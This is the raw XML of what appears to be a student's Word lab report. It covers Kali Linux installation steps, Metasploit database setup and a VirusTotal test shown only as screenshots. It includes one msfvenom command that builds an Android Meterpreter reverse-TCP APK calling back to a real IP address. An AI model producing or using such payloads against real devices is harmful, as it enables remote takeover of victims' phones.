        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Step 15:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="231D6D34" w14:textId="77777777" w:rsidR="00A53A4B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Choose the guided partition</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AF33B7C" w14:textId="77777777" w:rsidR="00A53A4B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Click continue.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="203DC47D" w14:textId="77777777" w:rsidR="00A53A4B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>It must show the disk capacity which was entered before.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CA7AAFA" w14:textId="77777777" w:rsidR="00A53A4B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Step 16:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4757222B" w14:textId="77777777" w:rsidR="00A53A4B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Select Partition disk as recommended for new users.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74C6B471" w14:textId="77777777" w:rsidR="00A53A4B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Step 17:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="060557AD" w14:textId="77777777" w:rsidR="00A53A4B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Select “Yes” to write changes to disk.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16014ECF" w14:textId="77777777" w:rsidR="00A53A4B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Step 18:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B390F33" w14:textId="77777777" w:rsidR="00A53A4B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Installing the base system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6708F39D" w14:textId="77777777" w:rsidR="00A53A4B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Step 19:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D76B0F0" w14:textId="77777777" w:rsidR="00A53A4B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Select All softwares</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D6EDE66" w14:textId="77777777" w:rsidR="00A53A4B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Step 20:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1156C886" w14:textId="77777777" w:rsidR="00A53A4B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Select </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>gdm3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> as display manager.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49576B82" w14:textId="77777777" w:rsidR="00A53A4B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Step 21:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39C44839" w14:textId="77777777" w:rsidR="00A53A4B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Install the Grub boot loader</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A137F0F" w14:textId="77777777" w:rsidR="00A53A4B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Select the device </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>“Only one device will be mentioned”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18FE3FD0" w14:textId="77777777" w:rsidR="00A53A4B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5247B7BE" wp14:editId="2460CFE3">
            <wp:extent cx="5333365" cy="1744980"/>
            <wp:effectExtent l="0" t="0" r="635" b="7620"/>
            <wp:docPr id="15556087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8702" name="Graphic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347134" cy="1749485"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CE2CE79" w14:textId="77777777" w:rsidR="00A53A4B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Setting Up and Using Metasploit Database and Payload Generation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5417F5D6" w14:textId="77777777" w:rsidR="00A53A4B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>sudo msfdb init</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="363EF294" w14:textId="77777777" w:rsidR="00A53A4B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>sudo msfdb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27ECD775" w14:textId="77777777" w:rsidR="00A53A4B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>sudo msfdb start</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4412661E" w14:textId="77777777" w:rsidR="00A53A4B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>sudo msfdb start</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10E452BC" w14:textId="77777777" w:rsidR="00A53A4B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>msfconsole -q</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2246B4DD" w14:textId="77777777" w:rsidR="00A53A4B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>db_status</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D954F77" w14:textId="77777777" w:rsidR="00A53A4B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>msfvenom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34163F27" w14:textId="77777777" w:rsidR="00A53A4B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>msfvenom -l payloads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54819A7A" w14:textId="77777777" w:rsidR="00A53A4B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>msfvenom -p android/meterpreter/reverse_tcp LHOST=136.232.46.202 LPORT=8880&gt;FSTest.apk</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B1015F6" w14:textId="77777777" w:rsidR="00A53A4B" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="31140577" wp14:editId="68228370">
            <wp:extent cx="5234305" cy="2004060"/>
            <wp:effectExtent l="0" t="0" r="4445" b="0"/>
            <wp:docPr id="908238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8129"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5364" cy="2008155"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="03273777" w14:textId="77777777" w:rsidR="00A53A4B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:sectPr w:rsidR="00A53A4B">
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="720" w:footer="720" w:gutter="0"/>
          <w:cols w:space="720"/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0F195E65" wp14:editId="5B470216">
            <wp:extent cx="5433060" cy="1706880"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="1031533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3128"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9916" cy="1709034"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4E27E513" wp14:editId="6B8BF6FF">
            <wp:extent cx="5387340" cy="1844040"/>
            <wp:effectExtent l="0" t="0" r="3810" b="3810"/>
            <wp:docPr id="1875398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8663"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1654" cy="1852362"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="738F8075" wp14:editId="633FF107">
            <wp:extent cx="5443855" cy="2034540"/>
            <wp:effectExtent l="0" t="0" r="4445" b="3810"/>
            <wp:docPr id="95582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2890" name="Picture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7148" cy="2039508"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="270E825F" wp14:editId="72AC2E68">
            <wp:extent cx="5463540" cy="2019300"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="9381930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3087"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081" cy="2022087"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="12879372" w14:textId="77777777" w:rsidR="00A53A4B" w:rsidRDefault="00A53A4B">
      <w:pPr>
        <w:sectPr w:rsidR="00A53A4B">
          <w:type w:val="continuous"/>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="720" w:footer="720" w:gutter="0"/>
          <w:cols w:num="2" w:space="720"/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76302D44" w14:textId="77777777" w:rsidR="00A53A4B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Testing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31458B08" w14:textId="77777777" w:rsidR="00A53A4B" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Virustotal</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="527D38F3" wp14:editId="28FEB525">
            <wp:extent cx="5943600" cy="2697480"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="1844075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75455"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53F3792A" w14:textId="77777777" w:rsidR="00A53A4B" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4E781160" wp14:editId="6F3F6DE8">
            <wp:extent cx="5943600" cy="2164080"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="5138713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1330"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r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6F685BE8" wp14:editId="119AD296">
            <wp:extent cx="5943600" cy="2293620"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2106317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17600"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r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7B8D8F58" wp14:editId="00C10E6C">
            <wp:extent cx="5943600" cy="1973580"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="511356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56153" name="Picture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r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0952E4A2" wp14:editId="4C19D273">
            <wp:extent cx="5943600" cy="1988820"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1432697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9795"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88820"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="15AB6294" wp14:editId="6AF18CFF">
            <wp:extent cx="5943600" cy="2080260"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="7252068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06806"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r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4FBB0C8B" wp14:editId="55DD1EB7">
            <wp:extent cx="5943600" cy="2125980"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="1964854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4150"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r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1EF033BD" wp14:editId="7FFDAAA7">
            <wp:extent cx="5943600" cy="1897380"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="6366631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14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r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4188D66F" wp14:editId="39972D47">
            <wp:extent cx="5943600" cy="1790700"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1179521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21320" name="Picture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r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="77B0C52C" wp14:editId="538914A8">
            <wp:extent cx="5943600" cy="2171700"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="19330608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0883" name="Picture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rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4CEA4B9E" wp14:editId="5363DD64">
            <wp:extent cx="5943600" cy="2186940"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="5805062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6266" name="Picture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r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="39311BDF" wp14:editId="2C070BFC">
            <wp:extent cx="5943600" cy="2141220"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="16004557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55756" name="Picture 2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r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="25639173" wp14:editId="77CFA684">
            <wp:extent cx="5943600" cy="2773680"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="5805942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4220" name="Picture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3E7C1022" w14:textId="77777777" w:rsidR="00A53A4B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Swastik Shetty</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3883B3F4" w14:textId="77777777" w:rsidR="00A53A4B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>2203166</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F9B7C0C" w14:textId="77777777" w:rsidR="00A53A4B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>LY-ISA1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AF29B1E" w14:textId="77777777" w:rsidR="00A53A4B" w:rsidRDefault="00A53A4B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4835C808" w14:textId="77777777" w:rsidR="00A53A4B" w:rsidRDefault="00A53A4B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00A53A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0F2B4" w14:textId="77777777" w:rsidR="002D0008" w:rsidRDefault="002D0008">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="475958FF" w14:textId="77777777" w:rsidR="002D0008" w:rsidRDefault="002D0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009EF" w14:textId="77777777" w:rsidR="002D0008" w:rsidRDefault="002D0008">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="002122D1" w14:textId="77777777" w:rsidR="002D0008" w:rsidRDefault="002D00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A11B6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="341A11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38D219D2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="38D219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CD5863"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6FCD586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50623131">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="227153119">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1826777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744"/>
    <w:rsid w:val="00011BDD"/>
    <w:rsid w:val="00083014"/>
    <w:rsid w:val="000831AA"/>
    <w:rsid w:val="00132744"/>
    <w:rsid w:val="0014712A"/>
    <w:rsid w:val="001C5F2E"/>
    <w:rsid w:val="002A6946"/>
    <w:rsid w:val="002D0008"/>
    <w:rsid w:val="00333680"/>
    <w:rsid w:val="003440B9"/>
    <w:rsid w:val="00461447"/>
    <w:rsid w:val="004D0151"/>
    <w:rsid w:val="00587172"/>
    <w:rsid w:val="005955E7"/>
    <w:rsid w:val="005C4304"/>
    <w:rsid w:val="00770F7D"/>
    <w:rsid w:val="007A5A4F"/>
    <w:rsid w:val="007B4392"/>
    <w:rsid w:val="00805A0C"/>
    <w:rsid w:val="00895BC6"/>
    <w:rsid w:val="00A53A4B"/>
    <w:rsid w:val="00D518CC"/>
    <w:rsid w:val="00D75199"/>
    <w:rsid w:val="00E569DC"/>
    <w:rsid w:val="00FA5B7F"/>
    <w:rsid w:val="7F6FE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472FF"/>
  <w15:docId w15:val="{7B7EEE5C-58FE-49C0-9E76-5EC6FB8F0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kern w:val="2"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
      <w:lang w:val="en-US" w:eastAsia="en-US"/>
      <w14:ligatures w14:val="standardContextual"/>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20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cdimage.kali.org/kali-2023.3/kali-linux-2023.3-installer-amd64.iso"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9</Pages>
  <Words>542</Words>
  <Characters>3090</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>25</Lines>
  <Paragraphs>7</Paragraphs>
  <ScaleCrop>false</ScaleCrop>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PAL</dc:creator>
  <cp:lastModifiedBy>Garvin Chanderia</cp:lastModifiedBy>
  <cp:revision>19</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-10-07T10:02:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-11-06T01:50:00Z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